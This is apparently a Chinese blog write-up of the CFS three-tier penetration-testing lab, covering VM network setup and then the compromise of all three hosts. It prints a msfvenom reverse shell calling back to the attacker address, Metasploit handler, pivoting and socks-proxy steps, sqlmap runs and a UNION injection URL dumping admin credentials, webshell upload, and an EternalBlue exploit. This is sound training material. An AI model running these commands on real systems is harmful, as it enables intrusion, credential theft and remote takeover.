CFS三层靶机搭建及其内网渗透

靶场环境

链接:CFS三层靶机环境_免费高速下载|百度网盘-分享无限制 (baidu.com)
提取码:qaza 

该靶机的渗透流程如下

通过攻击机kali192.168.1.xx攻击target1 的192.168.76.148,target2和target3不能连接外网,只能再内网进行通信。所以得先渗透target1,然后通过他的22网卡去攻击target2,然后通过target2做跳板来攻击target3

环境配置

一、配置网卡

在VM编辑处找到虚拟网络编辑器

点击更改设置

VMnet1改成下面这个样子

 

同理VMnet2、VMnet3也改

 

改完三张网卡之后导入三台虚拟机,Target1设置为VMnet1、VMnet2网卡

Target2设置为VMnet1、VMnet2、VMnet3网卡

Target3设置为VMnet3网卡

 攻击机kali2022设置为VMnet1网卡,与Target1互通,Target2也有VMnet1网卡是为了方便在kali修改Target2的配置,配置完会删掉

二、配置宝塔

分别打开三台靶机,输入账号密码进入

root

teamssix.com

查看三台靶机的ip地址,确保Target1一个在192.168.1.0网段、另一个在192.168.22.0网段

确保Target2在192.168.1.0、192.168.22.0、192.168.33.0网段

 确保Target3在192.168.33.0网段

确保kali2022在192.168.1.0网段

确认完毕后来到jkali,通过192.168.1.0网段的IP地址打开Tagrget1的宝塔面板

账号密码

地址:http://你的IP:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee

 打开192.168.1.128的80端口,确保kali可以访问到

Target2也同理,账号密码如下

地址:http://你的IP:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..

 根据你Target2的22网段IP修改

环境配置到这就完成了,最后删掉Target2的VM1网卡即可

Target1

搭完环境直接开打,使用nmap进行信息收集

nmap -sS -v -A 192.168.1.128

扫到80端口开放

访问一下80端口,很明显的thinkphp5框架

直接掏出工具扫一波,存在漏洞 

命令执行逐个尝试exp,发现第二个exp可以成功

那么接下的思路很明确了,存在RCE --> 写shell ->蚁剑连

 

 

连上后随便翻一下目录,发现在robots.txt、flag21sA.txt存在flag

 

查看一下权限,www是个低权限用户

先反弹个shell,在msf生成Linux的马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.129 LPORT=4444 -f elf>1.elf

生成完马先让msf监听本地的4444端口

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.129
set LPORT 4444
exploit

然后在蚁剑上传到/tmp目录下,虚拟终端执行

msf接收到会话

之前尝试了一下提权,都没成功,可能这靶机的作者觉得www的权限只够打内网了吧,不需要提权。

拿到会话后进行信息收集,获取网络接口

run get_local_subnets

 存在22网段,现在我们是在1网段进行沟通,如何访问到22网段呢,msf和cs都有代理集成功能,我们使用这些功能设置.,先添加路由

run autoroute -s 192.168.22.0/24
run autoroute -p

现在的会话是session1,是建立在Target1的shell上的,建立路由后可以和22网段进行通信。那么我们想要通过session1用工具去攻击22网段,这个时候该怎么办呢?

为了解决这种情况,我们可以在本地(msf上有模块可以开代理)开一个代理,通过这个代理给其他人一个端口去连接,然后我们就可以用自己的本机(自己的电脑,不是攻击机kali)去连接kali的端口,这样就能访问192.168.22.129了

background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1080
exploit

在linux系统下,可以利用本地的代理接口进行访问

vim /etc/proxychains4.conf

 在文件末尾修改成刚刚的配置信息

直接在kali用nmap对192.168.22.0网段进行扫描是不行的,会显示没有发现

需要加上刚刚配置好的代理文件才能进行扫描

 在windows下可以装个SocksCap64,设置代理

 将要使用的工具加入里面就可以了

Target2

在浏览器想访问22网段的话,也是很简单的,配置一下网络就好

 

 

 对192.168.22.129进行信息收集,扫一下目录

翻看一下robots.txt,找到后台登录地址,有验证码先不尝试爆破

 

查看源代码找到提示,存在sql注入

直接sqlmap跑

proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword –dbs
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump

不知道为什么最后一步没成功,直接在浏览器手注吧

http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%20group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin%23

拿去somd5解密

登录后台,拿下flag

四处翻翻找找可以拿shell的点,发现在模板的地方可以拿shell,与主页的内容进行对比,发现是 

主页是这个php

 写入一句话木马

上蚁剑进行连接

 继续传马在msf拿shell,不过目标是在192.168.22.0网段,主动连我们肯定是连不上的,所以这里需要正向连,msf去连它

生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf

msf正向连接

background
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.129
set LPORT 3333
exploit

 

 还是老步骤,信息收集+配置访问

获取网络接口:run get_local_subnets
添加路由地址:run autoroute -s 192.168.33.0/24
查看路由地址:run autoroute -p

Target3

尝试扫描33网段

proxychains4 nmap -Pn -sT 192.168.33.33

发现这是开放着445、3389端口的Windows系统 ,使用永恒之蓝试试

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
options
run

 拿到会话后随便执行系统命令了,这里shell乱码,可以输入chcp 65001修改编码,就好了

shell
net user

搜索flag

cd /
dir /S *flag* /B
type C:\Windows\System32\config\flag.txt
# /B 显示文件夹或文件的名字
# /S 显示指定目录和所有子目录中的文件。
# dir /S /B *flag* 这样写也可以

最后type查看即可

总结

一、第一次打内网的靶机,花了好多时间,搭环境+打靶,msf老是断会话、socks代理有时候玄学,就是这样配置的,但是就是不行。

二、打靶搞socks代理玄学时问了下学长,让我换个工具,不要仅仅局限在msf。的确,后面得学学怎么利用其它工具来打....

参考文章

CFS三层靶机搭建及其内网渗透附靶场环境 - 安全客,安全资讯平台 (anquanke.com)

代理技术应用之三层内网漫游 - FreeBuf网络安全行业门户

  • 11
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值